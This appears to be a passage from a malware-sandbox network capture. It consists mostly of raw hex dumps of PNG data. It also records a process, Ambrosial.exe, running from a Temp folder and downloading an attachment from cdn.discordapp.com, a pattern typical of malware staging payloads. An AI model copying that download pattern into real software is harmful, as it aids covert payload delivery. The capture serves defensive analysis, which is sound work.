                                                                                                                                                                                      2021-10-30 11:52:18 UTC653INData Raw: a2 c6 a7 68 fc e8 73 12 34 26 6d 49 d4 98 c8 f9 ff 7a 7a 5d fb a9 9a f7 01 db 53 bb 8a 61 03 e3 0c 4b de c9 98 69 61 27 69 c4 8a 9f b1 6a 0d 63 2d 6b 7d 23 51 d3 53 33 24 64 5f 33 41 fb 4b 4a d4 84 5f 33 49 63 b2 56 89 9a f6 45 ce 47 f6 cb 18 bd 0f f5 31 27 f0 7b 8c e9 3b 26 69 4a d6 9c a8 cd c7 9f 3c ef 78 d6 79 6c 3c df df fd b7 ff f0 67 48 d4 6a 22 05 cd 68 3c 08 dd 54 e8 c3 e5 9a a0 91 07 91 1f 29 4b f2 57 98 96 0b 96 e2 66 fb 55 c0 2d 86 dc ce 82 16 1e 82 7d 09 e5 fb 50 57 ad af a6 9e c6 6b 5d dd c0 ba 91 9c 7f 26 6b fa 05 02 d0 3c 55 db df 57 eb 24 4d 36 55 55 5d f6 c9 c5 a9 df 98 c4 8d c9 93 b3 24 68 df 7e c0 46 60 a2 46 3d 3f 4e ac 64 8d fe 5e 04 5e 9c e4 0d 33 80 89 91 eb a3 16 5e 51 bf 81 53 d6 08 9a 36 34 eb 39 61 ab 6a 39 6b 65 f1 5a 3f e8 7f
                                                                                                                                                                                      Data Ascii: hs4&mIzz]SaKia'ijc-k}#QS3$d_3AKJ_3IcVEG1'{;&iJ<xyl<gHj"h<T)KWfU-}PWk]&k<UW$M6UU]$h~F`F=?Nd^^3^QS649aj9keZ?
                                                                                                                                                                                      2021-10-30 11:52:18 UTC657INData Raw: bd 42 b7 f5 a2 51 aa 3f 1b 51 30 c9 22 35 ef c5 bc b1 13 33 51 fa c5 66 7f 10 e9 3c 7e f0 90 59 48 4f 1e 63 11 ad 21 69 f9 8a ef 65 2c 10 4f c7 b2 09 8f 75 b0 78 50 41 af a1 c5 57 a6 22 3f 14 be 07 b5 48 b9 f5 c0 5b b6 4e 7c 6d 4e 0d 40 7d 72 cd 26 49 7b 5f d4 09 1a 79 63 f5 f7 59 10 df 57 f8 36 20 2a 23 5c 49 df ae f3 86 ed c9 44 9d 10 45 8f dd 57 1b 45 ca 76 c1 f6 11 b0 56 5d b4 c9 64 bb d9 d2 b5 9c c2 c4 ed 05 dc 86 f4 92 3c 76 79 b4 9b 99 54 6b 2a 7e d9 80 a3 33 da ac 42 10 4b 33 c2 43 b8 73 4d 7c 59 81 92 f5 dc 41 34 92 cd 13 c8 6d 24 80 aa 5e f1 22 cb b6 a1 f5 06 af 89 27 d8 7d be 02 7a 94 17 63 04 9b 5a 7b be ca 60 da 80 9e d5 79 22 a0 ec 7d a5 27 69 7b bf c9 c6 92 be f1 67 73 75 20 31 29 c3 fe ea 04 4d 3c 93 34 fe ad 29 f3 f2 91 cd fb d1 f3 cc bd
                                                                                                                                                                                      Data Ascii: BQ?Q0"53Qf<~YHOc!ie,OuxPAW"?H[N|mN@}r&I{_ycYW6 *#\IDEWEvV]d<vyTk*~3BK3CsM|YA4m$^"'}zcZ{`y"}'i{gsu 1)M<4)
                                                                                                                                                                                      2021-10-30 11:52:18 UTC662INData Raw: 7c e6 bd 25 31 25 3f e8 4b 0a 0b 08 53 f4 a6 37 a4 a5 03 dc e8 82 e5 25 26 d2 f6 33 af d1 f6 d8 49 a1 5f 53 c0 35 c4 64 88 ef cd 4e cc 40 b1 a6 ee e8 8f 23 c9 2b c1 e0 7b 79 23 e3 61 1b a6 01 f1 12 69 83 9f e4 a9 97 36 94 cc e0 72 42 a6 74 4c 32 4f 01 db 58 df ba ee 03 7a 08 dd 1e a9 3f f6 04 af 24 ed ca bb 8d f0 6c c2 c0 c9 e1 fa e1 0f 8e eb 07 15 25 64 93 a4 f1 7b 9a 5a f3 3b 61 43 12 97 44 2d 4f d5 08 fe 38 74 e6 95 f3 e5 44 cd fb 94 ff a0 5d f3 88 bd e8 b3 6f e6 f3 dd 3f fe 27 7f a2 27 6a 0c 46 1b 88 8d 93 57 72 66 3e bf a2 ed 9f ac c8 83 e6 10 64 1d dd e1 5e fa 80 e1 08 3d 76 c2 21 9c 20 13 27 ab 01 bc 5f e6 55 46 21 0e e4 d4 97 16 6a d3 d6 54 11 6d 43 14 1d f2 19 7b 64 95 57 13 01 f5 cf 36 3f 27 ae 53 17 38 86 0e 68 51 cc b4 1b fd 27 c7 d8 0c e1 da
                                                                                                                                                                                      Data Ascii: |%1%?KS7%&3I_S5dN@#+{y#ai6rBtL2OXz?$l%d{Z;aCD-O8tD]o?''jFWrf>d^=v! '_UF!jTmC{dW6?'S8hQ'
                                                                                                                                                                                      2021-10-30 11:52:18 UTC666INData Raw: ba 9a e7 9c 6d e9 42 fb 94 93 a0 cd 47 9f d9 0f 93 ac 89 ca 7f e2 53 5b 00 f6 e4 b1 e3 ea 35 e3 79 30 42 1f e4 f5 f1 e3 17 ff 1f fb 7a c5 5a a7 9f fa e9 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                      Data Ascii: mBGS[5y0BzZIENDB`


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      9192.168.2.349756162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:19 UTC666OUTGET /attachments/489891892142669842/835331120836378624/atani2.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:19 UTC666INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:19 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 86444
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646fd2bf7d2c32-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 176950
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "5fbedc12274bef9a8145419c71c4bd26"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:19 GMT
                                                                                                                                                                                      Last-Modified: Sat, 24 Apr 2021 01:47:38 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1619228858964870
                                                                                                                                                                                      x-goog-hash: crc32c=PoXaSQ==
                                                                                                                                                                                      x-goog-hash: md5=X77cEidL75qBRUGcccS9Jg==
                                                                                                                                                                                      x-goog-metageneration: 2
                                                                                                                                                                                      x-goog-storage-class: NEARLINE
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 86444
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdsAplH4pta00HC98tcQR8c8ysZdtbKZ5acwh5v3DMoNtFpOW7h6wg1n9MFYrlLYYDitlXVQ3xe5MqpgmRt7tbE
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ktfW3a49EIsZRfxCOkOEq3p6p8JKeCH4vL55UsoDmJcft4bVCkRoKdLBI6l6XSPks23WslS83Ig90EKGPx%2F9PpLeNHaOXBRrh8co0RN4UNDeixCnDJYJNqnuyQ7kF3nL%2FYzaBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:19 UTC667INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:19 UTC667INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd c9 ef 6e 5d 9b 16 86 9d f3 15 10 d1 38 96 23 45 89 84 63 63 63 fa de 60 30 d8 45 63 7a 28 28 aa a1 1a 28 4c 6f 7a 30 32 41 72 93 80 07 51 32 f3 28 52 06 99 45 99 45 19 44 99 24 51 a4 4c 32 49 26 91 f2 07 44 91 32 4b a4 64 00 2e a8 aa ef fb 72 5f cd dd ad bd f6 ef 9c b7 cc cc 5c bf bd d6 7d dd d7 dd ac b5 f7 f3 3c fb d9 ef ef 9c f7 7d 3f ff c0 9f fc 9b df fd fc f9 f3 a7 4f 9f 62 f0 00 87 1b 8c 74 5b c6 d3 42 95 28 1f 87 92 69 c9 6c 25 07 47 8e 18 89 64 e7 42 15 01 73 dc 11 07
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYsodIDATx^n]8#Eccc`0Ecz(((Loz02ArQ2(REED$QL2I&D2Kd.r_\}<}?Obt[B(il%GdBs
                                                                                                                                                                                      2021-10-30 11:52:19 UTC669INData Raw: 8a c8 af a8 0d f8 9c 68 92 e3 bc 41 40 a5 21 36 79 c5 86 25 94 42 ac a5 bd 47 5d 13 5d a3 ef cc 07 a0 e4 1e 31 b9 50 fd b0 06 06 1f d2 e2 21 e8 fc 8d 1a 7d fc d0 7a 60 4a ee 01 34 ef 87 8e 5a 6f ac ff d8 9b 1f d4 10 53 ae 4c ed 83 f6 e5 41 0d 7e ac 16 5f bc 5a 35 0e 58 b4 b8 8e 98 60 31 37 6f 8d b3 c5 c8 a0 64 57 7b a4 e5 ec 80 fa c8 42 93 2d ee 07 b3 d3 5f 83 e5 e3 9a 05 7c 56 c5 db 46 1e 65 e7 bb 5e bf 71 07 34 03 c9 b6 c5 5e 48 c0 28 a6 6e f2 45 b0 4e c4 46 b5 1f d9 e4 cc f7 06 38 e7 66 02 a2 95 94 09 ad c3 86 23 17 3e 99 74 c7 7b 9d 59 d7 35 b0 9f 7f c8 0f 6a 78 03 e5 c5 2d 3e ac cc a9 e3 c0 34 74 07 32 b7 fc c9 c3 8a 4a 17 15 a3 92 71 78 24 db 76 0e c5 ae a5 91 6a 69 e4 0c 4e 3f 13 66 be 33 62 02 13 cf 2a d0 62 ce 67 2a 67 f8 e4 ce 9f 3c e3 42 f2 77
                                                                                                                                                                                      Data Ascii: hA@!6y%BG]]1P!}z`J4ZoSLA~_Z5X`17odW{B-_|VFe^q4^H(nENF8f#>t{Y5jx->4t2Jqx$vjiN?f3b*bg*g<Bw
                                                                                                                                                                                      2021-10-30 11:52:19 UTC670INData Raw: b5 f6 37 fa 69 1f 1e d8 57 3c 94 89 eb 81 2d a6 18 b0 1a f9 c0 c6 c7 45 5a 0f b4 45 d3 e2 58 cb 31 47 bc 6c 7a ed d3 2a ab b8 ad 0e 4c d6 68 d3 b7 e5 b9 f9 7c a1 f9 5c e7 88 ad 8a 07 c8 61 4d e2 6c 07 9f ba 06 a1 52 fa a6 85 58 d5 36 63 56 9c 48 cf fc 0d 19 96 f5 5c 65 38 af b6 e8 47 3f a6 e4 b2 24 e4 db aa d6 24 30 38 1b 1d f6 aa 91 bc 5a a5 72 0a 13 d7 fb 47 7e ec ef f0 bd 82 4b 96 17 b4 79 5b 1d a7 0f 0a 35 6d c7 61 19 b1 b5 2c 4e 27 b8 49 7d b8 cc 69 95 3c 2c 83 b2 50 45 56 7e 69 c8 d2 21 0e 4b bf 79 79 a9 db de 7a d0 23 a1 6a 5d 41 fa f0 1c 80 79 f6 90 50 39 69 69 6e 31 47 79 b4 7d e4 64 ad a7 ce 15 9e d7 72 73 7a 22 87 0e 9c 7e f3 e7 ba 18 22 d4 e4 2d 7f 72 5a 4f bd be e6 f4 01 f1 8c 08 a9 65 c8 ac f7 24 13 c8 48 80 a4 6b 1e 9c 56 c8 3e c0 ca 81 21
                                                                                                                                                                                      Data Ascii: 7iW<-EZEX1Glz*Lh|\aMlRX6cVH\e8G?$$08ZrG~Ky[5ma,N'I}i<,PEV~i!Kyyz#j]AyP9iin1Gy}drsz"~"-rZOe$HkV>!
                                                                                                                                                                                      2021-10-30 11:52:19 UTC671INData Raw: 70 3f 37 6e db 35 b8 be db 27 32 ef 12 fb fc a7 f0 a0 36 2f 32 66 1d 31 e5 c5 c6 9b 6c f8 c3 82 d0 4b 4b b9 98 ea 6c 41 3b 17 8e f2 d6 fa a7 66 9b 3a 26 33 48 14 60 66 8f 37 9e 3d 26 6f 8b 83 0c 92 ac c4 54 5b 37 e9 b8 fd ec 45 ce 59 7e ea 31 3d 6b 14 70 cb 40 73 e4 cc 38 7c 1f 31 d1 1b f6 d0 41 2d ca 0f cf 81 bd cf 8c d2 69 0e 8c bc c4 ee 69 6b ff 5c 8f 33 cd e8 c3 38 27 59 48 34 f6 24 65 24 8f f4 62 ea 5e b7 d7 56 34 19 65 cc e4 c0 f4 93 cf 14 47 f2 68 8c fe 09 2a 43 2c 7a e4 92 5b 90 99 b3 a0 9c a3 ae 9c b7 7c 52 e2 b9 3b e1 a6 ce dc 5e e3 d0 6d 81 b3 47 7e 29 91 3b b8 72 22 7c d6 34 7c e3 e1 0c bc 67 02 eb c6 3e 37 7b 22 d2 94 e9 7c df f4 64 52 f3 b4 2c 30 b4 c4 8c 9d c8 dc 99 93 9c 0b c2 97 c6 2f 80 18 b2 c3 77 2e 5c 05 60 01 93 ba b0 61 71 d8 a7 4d
                                                                                                                                                                                      Data Ascii: p?7n5'26/2f1lKKlA;f:&3H`f7=&oT[7EY~1=kp@s8|1A-iik\38'YH4$e$b^V4eGh*C,z[|R;^mG~);r"|4|g>7{"|dR,0/w.\`aqM
                                                                                                                                                                                      2021-10-30 11:52:19 UTC673INData Raw: 26 3b 72 80 20 e2 9e 1d 60 06 8f a9 87 e7 38 30 fb 02 eb 3c 81 f0 93 af ba 54 c3 b4 2c 76 b4 94 7a f4 95 7b 68 b6 c0 e6 f6 c2 2c 7d 2c 34 75 e0 ea f7 b4 50 ca 88 cf ac a9 a4 fe 8c 0b 4f ae 1b cb d4 81 f2 7d df b9 e6 41 82 e0 9c d9 0f 98 d7 e5 81 d2 76 b0 ab 81 ed 15 28 3b 96 7c 59 c0 64 e9 4f ad 1e f2 f2 a6 0d 9b 83 31 8c 38 e6 bf 51 c7 34 e9 98 a4 4c c4 39 e1 b4 f0 fa db f2 bd 70 b1 4c 4d 1e 0e 0d 8b 8c 41 0b 5e f7 19 1a 3b 09 ba e3 f9 25 13 53 59 0f ba 7d 6e 53 93 c5 c1 29 1d da 74 3d 3d 50 eb cf 9c 30 f9 1b 8a ea 0f 9f 54 76 ae 85 14 5d 6b ed 8f 25 b0 95 23 70 ad b8 78 d3 7e f4 f9 03 6e 1a a1 26 23 41 5c ee 53 df 1a b6 05 47 9b e3 76 4d 72 cf f4 25 2d 9d 2e cf 8d a4 74 bd 2e ad 13 72 48 4f be 7e c3 13 a4 1f 2e 00 c5 a6 b4 f8 b8 66 1b 47 d1 81 b3 ca bb
                                                                                                                                                                                      Data Ascii: &;r `80<T,vz{h,},4uPO}Av(;|YdO18Q4L9pLMA^;%SY}nS)t==P0Tv]k%#px~n&#A\SGvMr%-.t.rHO~.fG
                                                                                                                                                                                      2021-10-30 11:52:19 UTC674INData Raw: c1 a7 63 5f d8 5f da 22 2c 25 4d 25 a7 03 ba 90 a4 44 5c d3 67 da 4d 13 a8 9f 97 ff 8a b9 46 4d 42 d0 d9 7f 9c 1a b1 dc 75 3e e6 59 10 76 72 13 1e 9e a8 d7 ca 96 fa fd 5c 86 24 39 ec e4 69 93 03 cd a7 fa 8e 71 f6 2e 39 ba 95 7b e1 3c b7 d4 f5 5a b7 45 58 64 5a a5 c8 5a ed 7c 4e a5 66 c2 e2 6f a8 f3 30 a1 89 a9 ee ff 53 2f 3b fb de 78 bc 46 7f 89 ff 1d b5 b3 49 10 1e 87 ad 04 57 4c 9b a1 cc c5 cf 43 83 43 8f 40 3f 69 e2 a2 70 78 40 94 56 b1 c1 87 25 b3 5d f5 f0 14 b4 0d 96 75 9e 76 7e 20 fb 81 9a 55 2d b9 35 78 3a 8e 9e ae f2 74 6a 60 53 5b 71 51 cc 8b c3 88 db d3 41 d1 f2 ca 55 5c 91 57 fd f0 81 3c 0f 80 ba dd cd 35 8f 54 69 de 4b ea d9 f7 75 fd 2f e8 35 8f 18 41 5f 24 e3 32 15 b0 be aa 28 9e 6b d8 10 15 1b 93 43 84 6a 1a e5 06 11 ef fc cc dd eb 65 5e da
                                                                                                                                                                                      Data Ascii: c__",%M%D\gMFMBu>Yvr\$9iq.9{<ZEXdZZ|Nfo0S/;xFIWLCC@?ipx@V%]uv~ U-5x:tj`S[qQAU\W<5TiKu/5A_$2(kCje^
                                                                                                                                                                                      2021-10-30 11:52:19 UTC675INData Raw: 46 e5 e3 e0 24 1f 92 03 36 c9 16 9f 39 56 ac b5 ef a3 50 bc f4 ea 5c fd 88 8a 0b 75 3e d4 c5 67 fe dc 4b 82 9e 85 a9 03 4e 2f 7d da f3 1c 2a 76 e8 3d 07 2a 56 0a 91 35 4c a8 9c 63 ee 10 91 fc a9 ed 5b c2 8c 03 ed 07 d3 61 2c e7 80 77 ec 78 a6 e9 86 09 f8 eb 25 7c c5 7a 0f 9d 03 ec af a1 79 1d fa 1a 58 9f 89 00 fd 53 0c 1c d2 5a 2e 63 16 2f d5 44 eb 4e ac 26 7d 5e 1d 9b e7 10 da c8 05 de d6 98 e8 47 99 8d 56 dd 65 35 5b ab 1a c1 66 2b de fd 53 9b b6 f9 fa e3 44 6b 6d 49 c8 b9 da f4 07 97 19 d7 21 25 19 92 ca 5e 31 7f 61 66 b0 89 a9 fd c1 f7 3e 8e 4b 62 8c cc 07 46 69 76 5f 7b 2a 6d 58 71 f5 4b bd 71 2a ed cf f7 b0 ca 63 b2 26 a3 f9 d1 c1 c2 e8 c4 f9 75 25 92 bc 96 23 2b f8 fd 01 8d 82 ac 69 6a 15 72 7e 85 0f 9b 78 3c f2 94 fb cc 7c 48 13 d7 f0 29 ca 5f e7
                                                                                                                                                                                      Data Ascii: F$69VP\u>gKN/}*v=*V5Lc[a,wx%|zyXSZ.c/DN&}^GVe5[f+SDkmI!%^1af>KbFiv_{*mXqKq*c&u%#+ijr~x<|H)_
                                                                                                                                                                                      2021-10-30 11:52:19 UTC677INData Raw: d8 dd 6d f6 fa 89 b9 1f d2 98 8a 5f 2c 40 5e 82 48 af 95 be ad 36 a8 04 27 cd fb e3 15 91 5e fb 82 85 2f 37 7c 15 e5 2b 37 7f 43 53 39 b6 05 37 ab 4a 27 e8 c1 3b 06 8d c5 69 1d 4a 6d 72 61 f2 c4 a9 85 5f 92 09 8d f8 6c b7 78 d9 7d 6e 09 f8 8a 34 ea fd 17 66 72 76 b1 4d 5f 8b ed ee f5 9a 71 16 97 49 7e 7f 88 12 95 9f 54 de de 3b 5e bb e2 1e 00 79 4c f2 c7 1a 9c e4 7d fe 5b 3f fa 37 83 f9 c6 0a 81 93 6f 8e 31 e5 6d b2 be 50 1d e8 b8 62 8a 36 57 dc 3c 6b e1 e9 90 77 70 32 6a 56 5f b9 58 f7 1d 9a 05 78 ed 67 25 a8 d8 cd 27 9b b9 60 3a a4 ad 98 a6 f2 dd 07 10 f5 fa 83 63 ca 0e d0 ab db 8b 2e 4e 26 7b c4 e8 c9 95 5e dc 73 4b 91 57 aa ec f2 67 1f cd b4 4b 0b 94 ef ac 0a 80 a7 9a 7a 4c 3a c8 3b 77 ea 61 1d 78 f5 cd 34 fb 4d cb d9 36 a6 cc 48 bf 0c 63 2d 88 ed bd
                                                                                                                                                                                      Data Ascii: m_,@^H6'^/7|+7CS97J';iJmra_lx}n4frvM_qI~T;^yL}[?7o1mPb6W<kwp2jV_Xxg%'`:c.N&{^sKWgKzL:;wax4M6Hc-
                                                                                                                                                                                      2021-10-30 11:52:19 UTC678INData Raw: 54 87 7d 4d bd 1e 8d 7c 1d f2 b3 8f 1c 5b 1c 9c 64 15 fa 2a 0e cf 07 91 fd 01 85 e5 27 9f 79 93 d3 7a 00 6b 9f 80 c9 d3 77 de f4 75 c8 cf 3e 34 07 97 2b 13 a2 dd cc 62 5e 6a c0 8e 5f 62 31 55 cc c2 f6 67 5c 2c 7d 20 35 a0 a2 3a 84 88 77 06 dc ca 6a 1b d3 f4 57 2c 3e 76 4b ab f5 a0 27 0f 98 96 e2 3c 7e 68 49 47 2e 10 ee a1 2c 3f 97 49 0d 76 72 d9 71 63 0a 22 5e 44 78 d9 c7 7e 48 1b 4e d0 19 22 f7 24 5d b7 a1 99 93 4e 69 33 48 2e a1 2e 5d a0 6f 66 33 39 70 b8 82 b3 af b1 03 23 e7 9e de 2b bf 41 75 47 de 6a 16 31 fb f7 35 4e 44 d6 99 78 29 3c 1f 9c 89 87 16 6b bf 9c 02 bf 50 16 89 f2 e4 34 e2 cf c7 81 e9 1f b1 51 47 98 d2 cc 17 74 e6 dc ce a3 10 79 99 0a 3b f7 37 f4 6a 91 9a 31 4e 2d f0 78 04 39 d3 07 1c 59 09 72 7a bb e9 87 4d 91 36 3e 67 cb bf 20 4a f8 15
                                                                                                                                                                                      Data Ascii: T}M|[d*'yzkwu>4+b^j_b1Ug\,} 5:wjW,>vK'<~hIG.,?Ivrqc"^Dx~HN"$]Ni3H..]of39p#+AuGj15NDx)<kP4QGty;7j1N-x9YrzM6>g J
                                                                                                                                                                                      2021-10-30 11:52:19 UTC679INData Raw: f9 3a 8c ec 4b e1 63 af f0 6b e9 b7 95 0e 3d dd bc f6 30 c1 e9 55 ac e9 89 fa 5c ae 84 51 70 14 ce 07 16 22 fd 92 9a f3 fc 2e fa 20 a6 c3 27 ec 9f b1 8f fc 30 62 22 56 07 59 d4 78 2a 5b 92 b3 cf 39 af 58 f8 96 ce 07 b6 e5 a6 53 da 11 c7 6b 95 3e 6c 86 61 39 e8 55 ce e9 03 a4 43 f8 fc 3f f8 fe bf ac 7f a6 f0 dd 23 df 53 fb 4b 77 c4 62 c2 d7 89 14 6b 69 2f 31 0e 0b 15 8b 29 63 00 f9 63 7d f0 a1 85 00 5b 71 fe 0c 3f c8 23 9e 5a f5 56 4d 4e 52 11 b7 95 61 64 6a a4 21 90 cb 19 dc 1e 8f 51 67 82 39 6b 7c 90 67 1e 88 c2 69 19 ad 1a d8 f6 91 26 82 f9 f9 ba c0 22 5b c2 a3 a6 2c 0d 32 64 c3 58 a2 bd f6 05 42 2f 1e 78 cb 43 56 ad e1 e0 23 27 13 02 b7 9c 8c 52 b5 26 bf 51 9a c9 f6 dd 8f 4c 13 ec a9 25 e4 b7 30 fd 27 27 0d f4 79 02 43 6e 1e 78 f0 33 3e 9d 88 2c ff 3d
                                                                                                                                                                                      Data Ascii: :Kck=0U\Qp". '0b"VYx*[9XSk>la9UC?#SKwbki/1)cc}[q?#ZVMNRadj!Qg9k|gi&"[,2dXB/xCV#'R&QL%0''yCnx3>,=
                                                                                                                                                                                      2021-10-30 11:52:19 UTC681INData Raw: 30 a8 10 c2 d4 8a 9b ac 98 1c ce 33 6f e6 24 76 92 30 6b 26 5e eb 81 11 bc e5 01 d4 5f f2 ce d8 c4 47 75 c0 ab 3f de 65 67 ce 40 dd cf e7 7b 14 58 6e 38 8f 1e 2d 3c 42 81 f9 7d d3 b8 8a f7 7a db 57 7c 58 f4 56 7d e8 d3 3d 37 fc d6 62 e0 b6 85 5d d7 8e d8 fc 72 7f 41 c5 66 52 70 bb 32 33 76 01 c3 b3 20 f9 a8 9b 7a 60 86 d6 79 1d 79 0f 1f 28 f7 a6 5b 9b 39 c9 73 51 9a e4 b2 92 ac 11 c1 a7 6b 3c fe 0f 00 e9 96 7e d3 4e 3c 75 29 a3 d6 e4 f1 2f 07 d0 24 97 e5 a3 7f ea 0e ed bf 9b 17 c8 f8 89 b9 c7 a4 d9 17 86 34 a6 5b 2c c5 8c 0d ff f3 7f fe 47 ff 7c bc fb fa a6 f0 f8 c2 c5 a0 a3 1c 53 73 7a 9e cf 98 50 bc 74 45 34 87 35 81 4e 1a 53 66 cc 98 ec e0 61 1c b6 2e 60 ff 6f 3e 98 7a ba 4b 4c b4 f6 7b 3d db 19 7f 70 09 d0 c0 ab 36 08 29 63 d2 a9 e0 e8 00 8e 14 58 23
                                                                                                                                                                                      Data Ascii: 03o$v0k&^_Gu?eg@{Xn8-<B}zW|XV}=7b]rAfRp23v z`yy([9sQk<~N<u)/$4[,G|SszPtE45NSfa.`o>zKL{=p6)cX#
                                                                                                                                                                                      2021-10-30 11:52:19 UTC682INData Raw: a0 04 d2 1d 92 23 7f 05 82 0e 9f d6 4e c9 45 d2 98 e4 7e 30 c1 8a c8 58 34 9f 52 61 a7 e4 b4 f2 ea dc 21 0e 7d 04 c8 67 1a 26 9b 8d ab 78 ca 26 8f b4 10 86 b6 ae d9 89 2f d4 02 1f d6 13 8f 82 2f 63 5e 13 e0 56 33 72 56 f8 ac 05 ae 4f 4a 91 77 eb fb aa 7f 25 6e eb 4f dc b6 92 98 a5 eb 8b e5 9f 35 8e de 1f ad b5 42 df 60 4f 47 6a 9d da 87 fd 86 ff ba 94 03 15 3f 12 7d 2e d7 f2 eb 79 86 56 b2 c9 4a 6b 6d ca cf 57 79 26 8c cc b7 35 4f cc da 1b 8f 3e a2 a9 8d d8 c9 87 11 66 1c 48 7f ea 07 37 9e bf 99 7b f1 47 de aa 59 f5 c1 e9 c2 ce f3 11 7b d8 80 ae 73 fb 04 dd a1 4d 3f f9 4d 2b 63 9e f0 7a 9f ff 33 3c a8 91 d1 b7 89 5b 5c 10 70 cb e5 33 c6 59 13 3c e9 53 93 6e b7 ee 0f 36 8a e9 90 ef 84 ce eb f8 ec 83 04 79 8e 4d 3f 08 bc 9b 4f cd b9 1c 08 9a 63 aa 3a f2 18
                                                                                                                                                                                      Data Ascii: #NE~0X4Ra!}g&x&//c^V3rVOJw%nO5B`OGj?}.yVJkmWy&5O>fH7{GY{sM?M+cz3<[\p3Y<Sn6yM?Oc:
                                                                                                                                                                                      2021-10-30 11:52:19 UTC683INData Raw: 68 c2 b1 cb fe d2 34 a5 7e f3 c5 d5 2b f5 ee 2b 5d 3c ad 12 cb 27 71 cf d4 d3 9a 88 07 48 3a 37 83 a4 93 f7 34 34 fb 81 5c b3 39 30 fb 96 67 3f bc ca 0b 6f 24 ae fa 1b 0f cb 5e f6 69 1c b4 24 28 b0 b4 47 0f f3 c4 5c ef 62 02 c1 da d9 ba cd 08 37 4a ef bc 8f a1 82 47 5a 6c f0 a9 d9 de d0 27 34 30 1a cf fb e2 05 8f 72 fa 43 1c ad 1e 60 ec 35 fa 41 21 36 35 82 a6 a5 90 bc 16 0f dc 4e ae eb ce 0e 9d fd f1 45 e9 ba 91 f7 71 c9 57 61 3d 9c 01 74 6f 6b dc f2 4e 58 5c d7 6a 27 d6 79 dc ea 4b 7b a9 79 2b 5a b2 9d 6d 8c e1 15 9d da ce 16 42 7b c8 2d 74 89 48 ef 35 70 3c 00 9c b9 c4 75 cd 40 e8 ab 57 d6 d0 88 ab 34 26 87 40 f4 5b ac ad b5 11 af d9 a1 22 34 e3 37 61 95 93 f1 0c 0c 6b ba ff c8 f6 19 6f 5e 82 6a 86 d6 0f b2 f2 d5 c7 1c a8 be 80 f8 47 d7 48 66 d4 3c f6
                                                                                                                                                                                      Data Ascii: h4~++]<'qH:744\90g?o$^i$(G\b7JGZl'40rC`5A!65NEqWa=tokNX\j'yK{y+ZmB{-tH5p<u@W4&@["47ako^jGHf<
                                                                                                                                                                                      2021-10-30 11:52:19 UTC685INData Raw: f7 c4 38 b9 ac c2 a9 f1 90 2f 42 eb e8 b5 17 e9 8d eb 58 35 a2 ea 2d 75 c7 31 cd 3e b4 9c a4 ee 7a 4e d4 6f da bc 2e aa 96 26 a6 1c 06 93 c3 9a c0 34 77 4e 18 4b b2 f4 47 bf 8a 5b 3b fc d9 9b 5a f9 e2 74 69 95 2f 0e 6b df 48 de 39 52 30 b7 66 bd b8 40 4e a7 7b ee 7d 4d 5f 24 7d 82 fc d4 4d c2 38 c2 b9 fd 40 24 df 79 e6 78 ae 40 72 e7 1e 9c 16 34 0b 86 26 5e 5e f7 69 89 48 bd e6 11 4f 7f f7 31 a7 be 88 70 b8 c4 12 66 b7 80 1d 1a f7 ae b8 44 52 c2 74 28 8d 37 71 d6 9c 27 0f 40 ca 1b 1c f0 48 09 61 68 a4 b7 3e 86 e2 a4 85 ba 66 40 50 79 d6 76 e8 05 b9 c1 af ac 79 69 a4 6d bc 04 0b f3 62 bc 65 9f ea ae 11 6e 5a 22 62 1f 84 bf b4 43 14 a3 fc 2d 4f df 5f 63 81 d3 07 6e da 0d 8f 45 5c 73 96 da ff f2 1f e9 8e 38 e9 f4 df 6b 7b 1b ca 79 9c 23 70 ab bf f6 1c da a3
                                                                                                                                                                                      Data Ascii: 8/BX5-u1>zNo.&4wNKG[;Zti/kH9R0f@N{}M_$}M8@$yx@r4&^^iHO1pfDRt(7q'@Hah>f@PyvyimbenZ"bC-O_cnE\s8k{y#p
